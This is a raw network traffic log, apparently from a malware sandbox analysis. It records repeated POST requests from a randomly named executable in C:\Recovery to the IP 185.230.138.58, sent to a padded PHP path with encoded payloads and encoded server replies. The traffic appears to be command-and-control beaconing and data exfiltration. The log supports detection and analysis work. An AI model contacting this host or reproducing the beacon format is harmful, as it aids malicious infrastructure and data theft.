                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:26.053566933 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:26.405004025 CET1012OUTData Raw: 57 54 5f 51 5a 45 51 54 5b 59 51 56 59 52 58 51 56 5a 5d 57 5a 58 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WT_QZEQT[YQVYRXQVZ]WZX[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",$#4&,)-S"="^=?'16<)#T08$'3:'^& X/
                                                                                                                                        Dec 21, 2024 10:09:27.313674927 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:27.540658951 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:27 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        95192.168.2.450032185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:27.787962914 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:28.149534941 CET1012OUTData Raw: 52 55 5f 5d 5f 40 51 5e 5b 59 51 56 59 5c 58 5d 56 59 5d 59 5a 5b 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RU_]_@Q^[YQVY\X]VY]YZ[[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!818!<$%,:)5 ")Y<%X(?V$>+''"':'^& X/0
                                                                                                                                        Dec 21, 2024 10:09:29.041585922 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:29.276726961 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:28 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        96192.168.2.450036185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:29.523732901 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:29.874876022 CET1012OUTData Raw: 52 52 5f 5f 5a 44 54 51 5b 59 51 56 59 52 58 51 56 53 5d 5b 5a 5b 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR__ZDTQ[YQVYRXQVS][Z[[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G,"8#, %Z*_*) .-*?,\'(:<R0>($7)$'^& X/
                                                                                                                                        Dec 21, 2024 10:09:30.768599033 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:31.004739046 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:30 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        97192.168.2.450042185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:31.241272926 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:31.592593908 CET1012OUTData Raw: 57 54 5a 5d 5f 44 54 51 5b 59 51 56 59 52 58 5d 56 5d 5d 5e 5a 50 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WTZ]_DTQ[YQVYRX]V]]^ZP[@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C/?4/;1?6==T .5=8X&;&<)+0?36&*'^& X/
                                                                                                                                        Dec 21, 2024 10:09:32.494343042 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        98192.168.2.450047185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:32.526191950 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:32.873960018 CET1892OUTData Raw: 52 54 5f 51 5f 48 54 55 5b 59 51 56 59 59 58 5a 56 5d 5d 5f 5a 5a 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RT_Q_HTU[YQVYYXZV]]_ZZ[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",1 X#?;[$<%>:7.-><(2.?9'$X?'Q90'^& X/$
                                                                                                                                        Dec 21, 2024 10:09:33.773911953 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:34.009092093 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:33 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 02 21 26 38 0c 26 03 05 11 24 07 3d 05 3c 58 34 03 33 2f 39 40 34 1d 20 14 2a 3f 38 04 33 3d 22 14 27 12 09 0a 3e 23 33 59 2e 30 20 46 04 1c 23 5e 3c 23 36 51 3e 01 30 58 38 28 35 12 28 22 39 03 23 2f 22 03 20 3d 36 17 20 21 22 08 3c 00 3e 50 28 24 28 58 3a 00 3a 59 35 00 23 56 0b 1f 39 10 3e 30 31 00 30 34 20 14 25 37 29 0c 20 26 33 51 22 1c 24 0f 35 04 23 59 32 38 3d 03 22 16 2c 57 2a 11 00 10 25 5f 2f 09 2e 2d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&!&8&$=<X43/9@4 *?83="'>#3Y.0 F#^<#6Q>0X8(5("9#/" =6 !"<>P($(X::Y5#V9>0104 %7) &3Q"$5#Y28=",W*%_/.-&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        99192.168.2.450048185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:32.651525021 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:32.998924017 CET1012OUTData Raw: 57 55 5f 58 5a 45 51 51 5b 59 51 56 59 5c 58 5f 56 5a 5d 56 5a 5b 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WU_XZEQQ[YQVY\X_VZ]VZ[[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/4</Y1/>Y=.R7>9)? [18.+U&> ]$0:'^& X/0
                                                                                                                                        Dec 21, 2024 10:09:33.895138979 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:34.129435062 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:33 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        100192.168.2.450051185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:34.372772932 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:34.717638016 CET1012OUTData Raw: 57 53 5a 5f 5f 48 51 55 5b 59 51 56 59 5f 58 5c 56 5e 5d 56 5a 5c 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WSZ__HQU[YQVY_X\V^]VZ\[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX";8#Z?%Z!*[)#:*1=+:4$>'4"^'*'^& X/<
                                                                                                                                        Dec 21, 2024 10:09:35.624749899 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:35.856745005 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:35 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        101192.168.2.450055185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:36.104141951 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:36.452003956 CET1012OUTData Raw: 52 57 5f 58 5f 44 51 57 5b 59 51 56 59 5e 58 5a 56 52 5d 5b 5a 51 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RW_X_DQW[YQVY^XZVR][ZQ[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/#,?2=>="S7%)+1;")90'60'^& X/8
                                                                                                                                        Dec 21, 2024 10:09:37.350306034 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:37.584825993 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:37 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        102192.168.2.450061185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:37.822438002 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:38.170901060 CET1012OUTData Raw: 57 5e 5f 5e 5f 45 51 50 5b 59 51 56 59 5d 58 58 56 52 5d 56 5a 5d 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W^_^_EQP[YQVY]XXVR]VZ][F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"8!,X72<>Z(=9 _*,;1"(93U3=0X$>\3'^& X/
                                                                                                                                        Dec 21, 2024 10:09:39.074352026 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        103192.168.2.450066185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:39.139317989 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:39.483369112 CET1892OUTData Raw: 52 50 5f 5f 5f 48 51 57 5b 59 51 56 59 58 58 51 56 5d 5d 5c 5a 5c 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RP___HQW[YQVYXXQV]]\Z\[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"-2 Y4?7&,!(.)4%)?'1)[(7'>Y3=''^& X/
                                                                                                                                        Dec 21, 2024 10:09:40.387357950 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:40.620803118 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:40 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 1e 22 0b 27 55 25 3d 23 1f 33 58 2d 03 3c 3e 02 05 30 05 31 40 34 0d 38 1b 2a 2c 33 1e 33 07 35 05 26 3c 34 55 3f 20 01 5d 3a 30 20 46 04 1c 23 58 2b 0d 2e 19 3d 3b 2b 07 2d 3b 36 03 2b 1c 0c 5b 23 2c 2a 03 20 07 3e 5f 37 21 26 0c 3f 39 3d 0b 3d 24 30 5e 3a 07 2e 59 21 2a 23 56 0b 1f 39 52 3d 30 0f 00 27 34 2b 05 27 37 2e 1f 34 26 01 50 35 0c 24 0e 22 2d 23 58 31 01 2a 5a 35 38 06 53 29 3c 2e 5e 25 07 38 51 3a 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%"'U%=#3X-<>01@48*,335&<4U? ]:0 F#X+.=;+-;6+[#,* >_7!&?9==$0^:.Y!*#V9R=0'4+'7.4&P5$"-#X1*Z58S)<.^%8Q:=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        104192.168.2.450067185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:39.275360107 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:39.626326084 CET1012OUTData Raw: 52 52 5f 5a 5f 47 51 5e 5b 59 51 56 59 5b 58 51 56 5b 5d 5e 5a 5a 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR_Z_GQ^[YQVY[XQV[]^ZZ[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!8!,+[%(>1#:]>/%><*4$>;0Q>3*'^& X/,
                                                                                                                                        Dec 21, 2024 10:09:40.520483017 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:40.756876945 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:40 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        105192.168.2.450073185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:40.996599913 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:41.342775106 CET1012OUTData Raw: 52 54 5a 5f 5f 45 54 54 5b 59 51 56 59 59 58 5b 56 5a 5d 58 5a 58 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
